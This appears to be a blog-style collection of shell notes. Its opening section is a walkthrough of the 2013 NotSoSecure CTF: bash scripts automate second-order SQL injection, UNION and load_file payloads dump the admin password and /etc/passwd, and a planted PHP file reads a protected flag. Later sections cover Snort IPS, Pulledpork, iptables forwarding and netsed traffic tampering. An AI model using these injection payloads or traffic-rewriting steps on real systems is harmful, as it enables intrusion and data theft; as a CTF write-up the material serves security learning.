# NotSoSecure CTF October 2k13


# curl --silent --request POST --data "myusername=mu&mypassword=mp" http://ctf.notsosecure.com/71367217217126217712/checklogin.php | xxd -p -r ; echo
secret_register.html
# cat console
#!/bin/bash

echo -n "> "
while read line; do 
 username=`echo -n "$line" | sed -e "s/'/%27/g" -e 's/ /+/g'`
 curl --silent --cookie-jar nss --cookie nss --request GET "http://ctf.notsosecure.com/71367217217126217712/register.php?regname=$username&regemail=mail&regpass1=pass&regpass2=pass" > /dev/null 2>&1
 curl --silent --cookie-jar nss --cookie nss --request POST --data "myusername=$line&mypassword=pass" "http://ctf.notsosecure.com/71367217217126217712/checklogin.php" > /dev/null 2>&1
 curl --silent --cookie-jar nss --cookie nss "http://ctf.notsosecure.com/71367217217126217712/uber_secret.php" > /dev/null 2>&1
 osi=`tail -n1 nss | awk '{print $7}'`
 echo $osi | sed 's/%3D/=/g' | base64 -d ; echo
 echo -n "> "
done
# ./console
> ' and false union select table_name,null from information_schema.columns where table_schema not like '%_schema' and table_schema!='mysql' group by table_name limit 2,1 --
users
> ' and false union select column_name,null from information_schema.columns where table_name='users' limit 2,1 --
password
> ' and false union select password,null from users where name='admin' --
sqlilabRocKs!!
# curl --silent --cookie-jar nss --cookie nss --request POST --data 'myusername=admin&amypassword=sqlilabRocKs!!' "http://ctf.notsosecure.com/71367217217126217712/checklogin.php"
# curl --silent --cookie-jar nss --cookie nss "http://ctf.notsosecure.com/71367217217126217712/uber_secret.php" | grep -A 3 Success
   <h1>Success!</h1><br><a href='login.php'> click here to go back</a><br>
<div>Well done, Flag is 815290. 2nd flag is in file secret.txt</div>
<h3 class="h3_admin">You are Admin!</h3>
    <div><img src="images/login/smiley.gif"></div>
# cat secret
#!/bin/bash

echo -n "> "
while read line; do 
 echo "'$line'"
 mu="' and false union select load_file('$line'),null -- 123"
 username=`echo -n "$mu" | sed -e "s/'/%27/g" -e 's/ /+/g'`
 echo $username 
 curl --silent --cookie-jar nss --cookie nss --request GET "http://ctf.notsosecure.com/71367217217126217712/register.php?regname=$username&regemail=mail&regpass1=pass&regpass2=pass" > /dev/null 2>&1
 curl --silent --cookie-jar nss --cookie nss --request POST --data "myusername=$mu&mypassword=pass" "http://ctf.notsosecure.com/71367217217126217712/checklogin.php" > /dev/null 2>&1
 curl --silent --cookie-jar nss --cookie nss "http://ctf.notsosecure.com/71367217217126217712/uber_secret.php" > /dev/null 2>&1
 osi=`tail -n1 nss | awk '{print $7}'`
 echo $osi | sed 's/%3D/=/g' | base64 -d ; echo
 echo -n "> "
done
# ./secret
> /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:107:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ctf:x:1000:1000:,,,:/home/ctf:/bin/bash
temp123:x:1001:1001:weakpassword1:/home/temp123:/bin/sh
ntop:x:108:116::/var/lib/ntop:/bin/false
# ssh temp123@ctf.notsosecure.com
temp123@ctf.notsosecure.com's password:weakpassword1
$ find / -name secret.txt 2> /dev/null
/tmp/secret.txt
/secret.txt
$ cat /tmp/secret.txt
n0th1ng to s33...
$ cat /secret.txt
cat: /secret.txt: Permission denied
$ ls -l /secret.txt
-r-------- 1 www-data www-data 684 Oct 25 07:46 /secret.txt
$ cat /home/temp123/.* | less
$ cd /var/www
$ ls -l
total 40
drwxr-xr-x 4 root root 4096 Oct 25 07:47 71367217217126217712
drwxr-xr-x 3 root root 4096 Oct  7 22:17 css
drwxr-xr-x 4 root root 4096 Oct  7 22:17 ctf
drwxr-xr-x 3 root root 4096 Oct  7 21:59 ctf-ver3
-rw-r--r-- 1 root root  894 Sep 12 08:20 favicon.ico
drwxr-xr-x 2 root root 4096 Oct  7 22:17 img
-rw-r--r-- 1 root root  177 Oct  4 19:43 _index.html
-rw-r--r-- 1 root root 3929 Oct  9 08:04 index.html
-rw-r--r-- 1 root root 2654 Oct  7 22:17 index.html.bak
drwxr-xr-x 4 root root 4096 Oct 27 10:03 leaderboard
$ cd 71367217217126217712
$ ls -l
total 60
-rw-r--r-- 1 root root 1327 Oct 25 07:41 checklogin.php
drwxr-xr-x 2 root root 4096 Oct 22 09:54 css
-rw-r--r-- 1 root root 1607 Oct 22 07:47 error.php
-rw-r--r-- 1 root root  894 Oct 22 02:04 favicon.ico
drwxr-xr-x 4 root root 4096 Oct 22 02:04 images
-rw-r--r-- 1 root root 2092 Oct 22 07:44 index.php
-rw-r--r-- 1 root root 2092 Oct 22 07:45 login.php
-rw-r--r-- 1 root root  991 Oct 22 08:16 _Logout.php
-rw-r--r-- 1 root root 1238 Oct 22 09:40 Logout.php
-rw-r--r-- 1 root root 3040 Oct 22 08:00 _register.php
-rw-r--r-- 1 root root 3060 Oct 25 07:47 register.php
-rw-r--r-- 1 root root 1745 Oct 22 07:53 _secret_register.html
-rw-r--r-- 1 root root 1882 Oct 23 14:26 secret_register.html
-rw-r--r-- 1 root root 3324 Oct 22 08:05 _uber_secret.php
-rw-r--r-- 1 root root 3316 Oct 25 07:47 uber_secret.php
$ cat uber_secret.php
<?php
error_reporting(0);
session_start();
if(!session_is_registered(myusername)){
header("location:login.php");
die;
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>SQL</title>
<link rel="stylesheet" href="css/screen.css" type="text/css" media="screen" title="default" />

</head>
<body> 

<div id="page-top-outer">    

<div id="page-top">

 <div id="logo">
 </div>

 <div id="top-search">
  <table border="0" cellpadding="0" cellspacing="0">
  <tr>
  <td>
  <a href="Logout.php"><button>Logout</button></a>
  </td>
  </tr>
  </table>
 </div>

  <div class="clear"></div>

</div>
</div> 
<div class="clear"> </div><br />
<div class="clear"></div>
<div id="content-outer">
<div id="content">
 <div id="page-heading">
 </div>
<table border="0" width="100%" cellpadding="0" cellspacing="0" id="content-table">
 <tr>
  <th rowspan="3" class="sized"><img src="images/shared/side_shadowleft.jpg" width="20" height="300" alt="" /></th>
  <th class="topleft"></th>
  <td id="tbl-border-top"> </td>
  <th class="topright"></th>
  <th rowspan="3" class="sized"><img src="images/shared/side_shadowright.jpg" width="20" height="300" alt="" /></th>
 </tr>
 <tr>
  <td id="tbl-border-left"></td>
  <td>
  <div id="content-table-inner">

   <div id="table-content">
   <?php if($_SESSION['myusername']=='admin')
{?>
<h1>Success!</h1><br><a href='login.php'> click here to go back</a><br>
<div><?echo "Well done, Flag is 815290. 2nd flag is in file secret.txt";?></div>
<h3 class="h3_admin">You are Admin!</h3>
    <div><img src="images/login/smiley.gif"></div>
<?php }
 else { ?>
   <h3 class="h3_admin">You are not Admin!</h3>
    <div><img src="images/login/sad smiely.gif"></div>
   
   </div>
   <div style="padding-left:350px;font-weight:bold; font-size:20px;color:#92B22C;">
<?php
$host="localhost"; 
$username="2ndorder"; 
$password="2ndorder"; 
$db_name="2ndorder"; 
$tbl_name="users"; 
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

$sql="SELECT email,name FROM $tbl_name WHERE name='".$_SESSION['myusername']." '";

$result=mysql_query($sql);
$row = mysql_fetch_row($result);
$login1=$row[0];

echo "Logged in as <b>".htmlentities($_SESSION['myusername'])."</b><br>";?> 
<?
setcookie(session_id,base64_encode($login1));
?> 
</div>
 <?php } ?>
   <div class="clear"></div>
   
  </div>
  </td>
  <td id="tbl-border-right"></td>
 </tr>
 <tr>
  <th class="sized bottomleft"></th>
  <td id="tbl-border-bottom"> </td>
  <th class="sized bottomright"></th>
 </tr>
 </table>
 <div class="clear"> </div>
</div>
<div class="clear"> </div>
</div>
<div class="clear"> </div>
 
 <div class="footer">
  <ul>
   <li style="margin-top: 20px;">powered by</li>
   <li><a href="http://www.securitytube-training.com/virtual-labs/sql-injection-labs/">
    <img src="images/login/sql.jpg" class="img_login">
   </a></li>
   <li style="margin-top: 20px;">© NotSoSecure</li>
  </ul>
 </div>
</body>
</html>
$ cat register.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>SQLi labs</title>
<link rel="stylesheet" href="css/screen.css" type="text/css" media="screen" title="default" />
<link rel="shortcut icon" href="../favicon.ico">


</head>
<body> 

<div id="page-top-outer">    


<div id="page-top">

 
 <div id="logo">
 </div>

 
 
 <div id="top-search">
  <table border="0" cellpadding="0" cellspacing="0">
  <tr>
  <td>
  
  </td>
  </tr>
  </table>
 </div>
  
  <div class="clear"></div>

</div>

</div>
 
<div class="clear"> </div>
  <div class="clear"></div>
<div id="content-outer">
<div id="content">
 <div id="page-heading">
 </div>
 <table border="0" width="100%" cellpadding="0" cellspacing="0" id="content-table">
 <tr>
  <th rowspan="3" class="sized"><img src="images/shared/side_shadowleft.jpg" width="20" height="300" alt="" /></th>
  <th class="topleft"></th>
  <td id="tbl-border-top"> </td>
  <th class="topright"></th>
  <th rowspan="3" class="sized"><img src="images/shared/side_shadowright.jpg" width="20" height="300" alt="" /></th>
 </tr>
 <tr>
  <td id="tbl-border-left"></td>
  <td>
  <div id="content-table-inner">
   <div id="table-content">
   <?php
error_reporting(0);
if($_GET["regname"] && $_GET["regemail"] && $_GET["regpass1"] && $_GET["regpass2"] )
{
if($_GET["regpass1"]==$_GET["regpass2"])
{
$servername="localhost";
$username="2ndorder";
$conn= mysql_connect($servername,$username,'2ndorder','2ndorder')or die(mysql_error());
mysql_select_db("2ndorder",$conn);
$sql1="select * from users where name ='".mysql_real_escape_string($_REQUEST['regname'])."'";
$result1=mysql_query($sql1);
$row1 = mysql_fetch_row($result1);
$count1=mysql_num_rows($result1);
if ($count1>0)
{
echo "<a href='login.php'>click here to login</a><br>";
die("User Already Exist");
}
$sql="insert into users (name,email,password)values('".mysql_real_escape_string($_GET[regname])."','".mysql_real_escape_string($_GET[regemail])."','".mysql_real_escape_string($_GET[regpass1])."')";
$result=mysql_query($sql,$conn) or die(mysql_error());
print "You have sucessfully registered!<br>";
print "<a href='login.php'>go to login page</a>";
}
else print "passwords don't match";
}
else { ?> <div class="register_invelid">Invaild data</div>
<?php }
?>
</div>
   <div class="clear"></div>
  </div>
  </td>
  <td id="tbl-border-right"></td>
 </tr>
 <tr>
  <th class="sized bottomleft"></th>
  <td id="tbl-border-bottom"> </td>
  <th class="sized bottomright"></th>
 </tr>
 </table>
 <div class="clear"> </div>

</div>
<div class="clear"> </div>

<div class="footer">
 <ul>
  <li style="margin-top: 20px;" >powered by</li>
  <li><a href="http://www.securitytube-training.com/virtual-labs/sql-injection-labs/">
   <img class="img_login" src="images/login/sql.jpg">
  </a></li>
  <li style="margin-top: 20px;">© NotSoSecure</li>
 </ul>
 
</div>
</div> 
</body>
</html>
$ apachectl -M
/usr/sbin/apachectl: 87: ulimit: error setting limit (Operation not permitted)
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
Loaded Modules:
 core_module (static)
 log_config_module (static)
 logio_module (static)
 mpm_prefork_module (static)
 http_module (static)
 so_module (static)
 alias_module (shared)
 auth_basic_module (shared)
 authn_file_module (shared)
 authz_default_module (shared)
 authz_groupfile_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 cgi_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 mime_module (shared)
 negotiation_module (shared)
 php5_module (shared)
 reqtimeout_module (shared)
 setenvif_module (shared)
 status_module (shared)
 userdir_module (shared)
Syntax OK
$ cat /etc/apache2/mods-enabled/userdir.conf
<IfModule mod_userdir.c>
        UserDir public_html
        UserDir disabled root

        <Directory /home/*/public_html>
                AllowOverride FileInfo AuthConfig Limit Indexes
                Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
                <Limit GET POST OPTIONS>
                        Order allow,deny
                        Allow from all
                </Limit>
                <LimitExcept GET POST OPTIONS>
                        Order deny,allow
                        Deny from all
                </LimitExcept>
        </Directory>
</IfModule>
$ cd /home/temp123
$ mkdir public_html
$ vi index.php
<?php echo file_get_contents('/secret.txt');
<ESC>:wq
$ exit
# curl --silent http://ctf.notsosecure.com/~temp123/index.php
Well done, 2nd Flag is 128738213812990.

email both the flags to ctf@notsosecure.com with subject CTF FLAGS!

make sure you delete all the files you have created on the server so you dont allow other users easy points by using the files left by you on the server.

Please provide a detailed write up to qualify for cash prize!
The person with best write-up wins. You are allowed to publish the write-up on public site, but please do this after the CTF has finished (sunday, 27th October).

Hope you enjoyed the CTF. This was taken from one of challenges we have on SQLi Labs. To practice more on this visit our SQLi Labs.

The next public CTF will take place in December.

Thanks
Sid

# Vodafone 3G connection with wvdial


# # Modem: Huawei K3806
# cat /etc/wvdial.conf
[Dialer Defaults]
Phone = *99#
Username = vodafone
Password = vodafone
Stupid Mode = 1
Dial Command = ATDT

[Dialer pin]
Init1 = AT+CPIN=1234

[Dialer vodafone]
Modem = /dev/ttyUSB0
Baud = 460800
Init2 = ATZ
Init3 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init5 =AT+CGDCONT=1,”IP”,”ac.vodafone.es”
ISDN = 0
Modem Type = Analog Modem
# wvdial pin vodafone

# Pulledpork installation and configuration


# apt-get install libcrypt-ssleay-perl liblwp-protocol-https-perl
# cd /usr/local/bin
# curl --silent --location --output pulledpork.pl http://pulledpork.googlecode.com/svn/trunk/pulledpork.pl
# vi pulledpork.pl
---
"$Snort_path -c $Snort_config --dump-dynamic-rules=$Sostubs 2>&1|"
+++
"$Snort_path -Q -c $Snort_config --dump-dynamic-rules=$Sostubs 2>&1|"
# chmod 755 pulledpork.pl
# mkdir /etc/pulledpork
# cd /etc/pulledpork
# sed -i '/^include $RULE_PATH/d' /usr/local/snort/etc/snort.conf
# echo "include \$RULE_PATH/snort.rules" >> /usr/local/snort/etc/snort.conf
# echo "include \$RULE_PATH/local.rules" >> /usr/local/snort/etc/snort.conf
# rm /usr/local/snort/rules/*.rules
# touch /usr/local/snort/rules/snort.rules
# touch /usr/local/snort/rules/local.rules
# touch /usr/local/snort/rules/white_list.rules
# cat pulledpork.conf
rule_url=https://www.snort.org/reg-rules/|snortrules-snapshot.tar.gz|<oinkcode>
rule_url=https://s3.amazonaws.com/snort-org/www/rules/community/|community-rules.tar.gz|Community
rule_url=http://labs.snort.org/feeds/ip-filter.blf|IPBLACKLIST|open
rule_url=https://www.snort.org/reg-rules/|opensource.gz|<oinkcode>
rule_url=https://rules.emergingthreatspro.com/|emerging.rules.tar.gz|open
ignore=deleted.rules,experimental.rules,local.rules
temp_path=/tmp
rule_path=/usr/local/snort/rules/snort.rules
local_rules=/usr/local/snort/rules/local.rules
sid_msg=/usr/local/snort/etc/sid-msg.map
sid_msg_version=1
sid_changelog=/var/log/snort/sid_changes.log
sorule_path=/usr/local/snort/lib/snort_dynamicrules
snort_path=/usr/local/snort/bin/snort
config_path=/usr/local/snort/etc/snort.conf
# Ubuntu-8.04, Ubuntu-10-4
distro=Ubuntu-12-04
black_list=/usr/local/snort/rules/black_list.rules
IPRVersion=/usr/local/snort/rules/iplists
#snort_control=/usr/local/bin/snort_control
version=0.7.0
# pulledpork.pl -c /etc/pulledpork/pulledpork.conf

# Combinatoric generator


# cat combgen
#!/usr/bin/python

# Combinatoric generator

from sys import argv
from itertools import combinations, permutations, product

f=argv[1]
r=int(argv[2])
n=argv[3::]

def doprint(r):
        for i in r:
                for j in i:
                        print j,
                print

def calc_combination(n,r):
        fr=1
        for i in range(0,r):
                fr=fr*(i+1)
        return calc_permutation(n,r)/fr

def calc_permutation(n,r):
        ln=len(n)
        lnr=ln-r
        fn=1
        for i in range(0,ln):
                fn=fn*(i+1)
        fnr=1
        for i in range(0,lnr):
                fnr=fnr*(i+1)
        return fn/fnr

def calc_product(n,r):
        ln=len(n)
        return ln**r

def help():
        print "Usage: combgen <combination|permutation|product> <r> <n>"

if      f == 'combination':
        print "Combinations = ",calc_combination(n,r)
        doprint(combinations(n,r))
elif    f == 'permutation':
        print "Permutations =",calc_permutation(n,r)
        doprint(permutations(n,r))
elif    f == 'product':
        print "Products =",calc_product(n,r)
        doprint(product(n,repeat=r))
else:
        help()

# forwarder: forward all incoming connections to other host


# cat forwarder
#!/bin/bash

action="$1"
source="$2"
listener="$3"
target="$4"

in='iptables --table nat'

case $action in
start)
        echo 1 > /proc/sys/net/ipv4/ip_forward
        $in --append PREROUTING \
                --source $source --destination $listener \
                --jump DNAT --to-destination $target
        $in --append POSTROUTING \
                --source $source --destination $target \
                --jump SNAT --to-source $listener
        ;;
stop)
        $in --delete PREROUTING \
                --source $source --destination $listener \
                --jump DNAT --to-destination $target
        $in --delete POSTROUTING \
                --source $source --destination $target \
                --jump SNAT --to-source $listener
        ;;
status)
        $in --numeric --list --line-numbers
        ;;
clean)
        $in --flush
esac
# ./forwarder start 192.168.1.1 192.168.1.2 8.8.8.8

# netsed: modify network packets on-the-fly


Bridge mode

# # eth0 = outside & eth1 = inside
# ifconfig eth0 promisc up
# ifconfig eth1 promisc up
# brctl addbr br0
# brctl addif br0 eth0 eth1
# ifconfig br0 192.168.1.111/24 up
# iptables --table nat -A PREROUTING --match physdev --physdev-in eth0 --source 192.168.1.0/24 --protocol tcp --dport 80 --jump REDIRECT --to-port 1080
# # --match physdev --physdev-in eth0 | --in-interface br0
# netsed tcp 1080 0 0 's/Accept-Encoding/4ccept-Encoding' 's/Never/Forever'
Host mode

# iptables --table nat -A PREROUTING --in-interface eth0 --source 192.168.1.0/24 --protocol tcp --dport 80 --jump REDIRECT --to-port 1080
# netsed tcp 1080 0 0 's/Accept-Encoding/4ccept-Encoding' 's/Never/Forever'

# Snort IPS: afpacket and nfq


# apt-get install build-essential
# apt-get install bison flex
# apt-get install libpcap-dev
# apt-get install libpcre3-dev
# apt-get install libnet1-dev
# apt-get install zlib1g-dev
# apt-get install libnetfilter-queue-dev # daq: nfq

# curl --silent --location --output libdnet-1.12.tgz http://libdnet.googlecode.com/files/libdnet-1.12.tgz
# tar xvzf libdnet-1.12.tgz
# cd libdnet-1.12
# ./configure "CFLAGS=-fPIC -g -O2"
# make
# make install
# ln -s /usr/local/lib/libdnet.1.0.1 /usr/lib/libdnet.1
# cd ..

# curl --silent --location --output daq-2.0.1.tar.gz https://www.snort.org/downloads/2546
# tar xvzf daq-2.0.1.tar.gz
# cd daq-2.0.1
# ./configure
# make
# make install
# cd ..

# curl --silent --location --output snort-2.9.5.3.tar.gz https://www.snort.org/downloads/2485
# tar xvzf snort-2.9.5.3.tar.gz
# cd snort-2.9.5.3
# ./configure --prefix=/usr/local/snort --enable-sourcefire
# make
# make install
# cd ..

# mkdir /var/log/snort
# groupadd snort
# useradd -g snort snort
# chown snort:snort /var/log/snort

# curl --silent --location --output snortrules-snapshot-2953.tar.gz http://www.snort.org/reg-rules/snortrules-snapshot-2953.tar.gz/<oinkcode>
# tar xvzf snortrules-snapshot-2953.tar.gz -C /usr/local/snort
# mkdir /usr/local/snort/lib/snort_dynamicrules
# cp /usr/local/snort/so_rules/precompiled/Ubuntu-12-04/x86-64/2.9.5.3/* /usr/local/snort/lib/snort_dynamicrules/.
# touch /usr/local/snort/rules/white_list.rules
# touch /usr/local/snort/rules/black_list.rules
# ldconfig

# vi /usr/local/snort/etc/snort.conf
---
var WHITE_LIST_PATH ../rules
var BLACK_LIST_PATH ../rules
+++
var WHITE_LIST_PATH /usr/local/snort/rules
var BLACK_LIST_PATH /usr/local/snort/rules

---
dynamicpreprocessor directory /usr/local/lib/snort_dynamicpreprocessor/
dynamicengine /usr/local/lib/snort_dynamicengine/libsf_engine.so
dynamicdetection directory /usr/local/lib/snort_dynamicrules
+++
dynamicpreprocessor directory /usr/local/snort/lib/snort_dynamicpreprocessor/
dynamicengine /usr/local/snort/lib/snort_dynamicengine/libsf_engine.so
dynamicdetection directory /usr/local/snort/lib/snort_dynamicrules

# ifconfig eth0 promisc up
# ifconfig eth1 promisc up
afpacket (L2)
# vi /usr/local/snort/etc/snort.conf
+++
config daq: afpacket
config daq_mode: inline

# /usr/local/snort/bin/snort -m 027 -d -l /var/log/snort -u snort -g snort -c /usr/local/snort/etc/snort.conf -Q -i eth0:eth1 -S HOME_NET=[192.168.1.0/24]
nfq (L3)
# vi /usr/local/snort/etc/snort.conf
+++
config daq: nfq
config daq_mode: inline
config daq_var: queue=0

# iptables --append FORWARD --jump NFQUEUE --queue-num 0
# /usr/local/snort/bin/snort -m 027 -d -l /var/log/snort -u snort -g snort -c /usr/local/snort/etc/snort.conf -Q -S HOME_NET=[192.168.1.0/24]

# W0PR wargame


# curl --silent --output wargame.html http://w0pr.net
# sed -n 's/.*<script>\(.*\)<\/script>.*/\1/p' wargame.html > source.js
# cat dehieroglyphy
#!/bin/bash

ifile="$1"
ofile="$ifile.decoded"

cp $ifile $ofile

function escape(){
        echo $* | sed -e "s/\[/\\\[/g" -e "s/\]/\\\]/g" -e "s/ /\\\ /g"
}

number_0='+[]'
number_1='+!![]'
number_2='!+[]+!![]'
number_3='!+[]+!![]+!![]'
number_4='!+[]+!![]+!![]+!![]'
number_5='!+[]+!![]+!![]+!![]+!![]'
number_6='!+[]+!![]+!![]+!![]+!![]+!![]'
number_7='!+[]+!![]+!![]+!![]+!![]+!![]+!![]'
number_8='!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]'
number_9='!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]'

character_0="($number_0+[])"
character_1="($number_1+[])"
character_2="($number_2+[])"
character_3="($number_3+[])"
character_4="($number_4+[])"
character_5="($number_5+[])"
character_6="($number_6+[])"
character_7="($number_7+[])"
character_8="($number_8+[])"
character_9="($number_9+[])"

_object_Object='[]+{}'
_NaN='+{}+[]'
_true='!![]+[]'
_false='![]+[]'
_undefined='[][[]]+[]'

character_blank="($_object_Object)[$number_7]"
character_leftsquarebracket="($_object_Object)[$number_0]"
character_rightsquarebracket="($_object_Object)[$character_1+$character_4]"
character_a="($_NaN)[$number_1]"
character_b="($_object_Object)[$number_2]"
character_c="($_object_Object)[$number_5]"
character_d="($_undefined)[$number_2]"
character_e="($_undefined)[$number_3]"
character_f="($_undefined)[$number_4]"
character_i="($_undefined)[$number_5]"
character_j="($_object_Object)[$number_3]"
character_l="($_false)[$number_2]"
character_n="($_undefined)[$number_1]"
character_o="($_object_Object)[$number_1]"
character_r="($_true)[$number_1]"
character_s="($_false)[$number_3]"
character_t="($_true)[$number_0]"
character_u="($_undefined)[$number_0]"
character_N="($_NaN)[$number_0]"
character_O="($_object_Object)[$number_8]"

_Infinity="+($number_1+$character_e+$character_1+$character_0+$character_0+$character_0)+[]"

character_y="($_Infinity)[$number_7]"
character_I="($_Infinity)[$number_0]"

_1e100="+($number_1+$character_e+$character_1+$character_0+$character_0)+[]"
character_plus="($_1e100)[$number_2]"

sed -i "s/`escape $character_plus`/+/g" $ofile
sed -i "s/`escape $character_I`/I/g" $ofile
sed -i "s/`escape $character_y`/y/g" $ofile
sed -i "s/`escape $character_O`/O/g" $ofile
sed -i "s/`escape $character_N`/N/g" $ofile
sed -i "s/`escape $character_u`/u/g" $ofile
sed -i "s/`escape $character_t`/t/g" $ofile
sed -i "s/`escape $character_s`/s/g" $ofile
sed -i "s/`escape $character_r`/r/g" $ofile
sed -i "s/`escape $character_o`/o/g" $ofile
sed -i "s/`escape $character_n`/n/g" $ofile
sed -i "s/`escape $character_l`/l/g" $ofile
sed -i "s/`escape $character_j`/j/g" $ofile
sed -i "s/`escape $character_i`/i/g" $ofile
sed -i "s/`escape $character_f`/f/g" $ofile
sed -i "s/`escape $character_e`/e/g" $ofile
sed -i "s/`escape $character_d`/d/g" $ofile
sed -i "s/`escape $character_c`/c/g" $ofile
sed -i "s/`escape $character_b`/b/g" $ofile
sed -i "s/`escape $character_a`/a/g" $ofile
sed -i "s/`escape $character_rightsquarebracket`/]/g" $ofile
sed -i "s/`escape $character_leftsquarebracket`/[/g" $ofile
sed -i "s/`escape $character_blank`/ /g" $ofile
sed -i "s/`escape $character_9`/9/g" $ofile
sed -i "s/`escape $character_8`/8/g" $ofile
sed -i "s/`escape $character_7`/7/g" $ofile
sed -i "s/`escape $character_6`/6/g" $ofile
sed -i "s/`escape $character_5`/5/g" $ofile
sed -i "s/`escape $character_4`/4/g" $ofile
sed -i "s/`escape $character_3`/3/g" $ofile
sed -i "s/`escape $character_2`/2/g" $ofile
sed -i "s/`escape $character_1`/1/g" $ofile
sed -i "s/`escape $character_0`/0/g" $ofile
sed -i "s/`escape $number_9`/9/g" $ofile
sed -i "s/`escape $number_8`/8/g" $ofile
sed -i "s/`escape $number_7`/7/g" $ofile
sed -i "s/`escape $number_6`/6/g" $ofile
sed -i "s/`escape $number_5`/5/g" $ofile
sed -i "s/`escape $number_4`/4/g" $ofile
sed -i "s/`escape $number_3`/3/g" $ofile
sed -i "s/`escape $number_2`/2/g" $ofile
sed -i "s/`escape $number_1`/1/g" $ofile

functionConstructor="[][s+o+r+t][c+o+n+s+t+r+u+c+t+o+r]"
returnLocation="([]+$functionConstructor(r+e+t+u+r+n+ +l+o+c+a+t+i+o+n)())"
character_h="$returnLocation[0]"
character_p="$returnLocation[3]"
character_slash="$returnLocation[6]"

sed -i "s/`escape $character_h`/h/g" $ofile
sed -i "s/`escape $character_p`/p/g" $ofile
sed -i "s/`escape $character_slash`/\//g" $ofile

_unescape="$functionConstructor(r+e+t+u+r+n+ +u+n+e+s+c+a+p+e)()"
_escape="$functionConstructor(r+e+t+u+r+n+ +e+s+c+a+p+e)()"

character_percentage="$_escape([)[+[]]"
sed -i "s/`escape $character_percentage`/%/g" $ofile

for i in {2..7}; do
        for j in {0..9} {a..e}; do
                char=`printf "\x$i$j\n"`
                if [ "$char" == '\' ]; then char='\\'; fi
                match="$_unescape(%+$i+$j)"
                sed -i "s/`escape $match`/$char/g" $ofile
        done
done

sed -i "s/`escape $functionConstructor`/Function/" $ofile
sed -i "s/+//g" $ofile

cat $ofile
# ./dehieroglyphy source.js
Function(setInterval(function(){var a = document.getElementById('blinking');if (a.style.display == 'none') a.style.display = 'inline';else a.style.display = 'none';}, 500 );)()
References

https://github.com/alcuadrado/hieroglyphy/blob/master/hieroglyphy.js